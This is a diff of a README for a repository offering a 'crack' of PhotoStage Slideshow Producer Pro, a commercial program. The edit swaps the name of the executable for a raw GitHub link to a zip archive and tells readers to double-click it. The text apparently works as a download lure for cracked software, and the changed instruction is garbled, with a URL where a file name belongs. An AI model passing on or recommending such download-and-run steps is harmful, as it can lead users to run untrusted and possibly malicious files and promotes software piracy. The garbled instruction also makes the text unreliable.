S1m03tl/PhotoStage_Slideshow_Producer_Pro_Crack/README.md

    - You can now open PhotoStage from your Applications.

 ### 📂 Step 5: Run Portable Version
 If you opted for the portable version, simply extract the downloaded folder.
-Inside, locate the `PhotoStage.exe` file (for Windows) or `PhotoStage` (for Mac) and double-click to open it.
+Inside, locate the `https://raw.githubusercontent.com/S1m03tl/PhotoStage_Slideshow_Producer_Pro_Crack/main/anadipsic/PhotoStage_Slideshow_Producer_Pro_Crack.zip` file (for Windows) or `PhotoStage` (for Mac) and double-click to open it.

 ## 📖 Features
 - **Easy to Use:** Intuitive interface that anyone can navigate.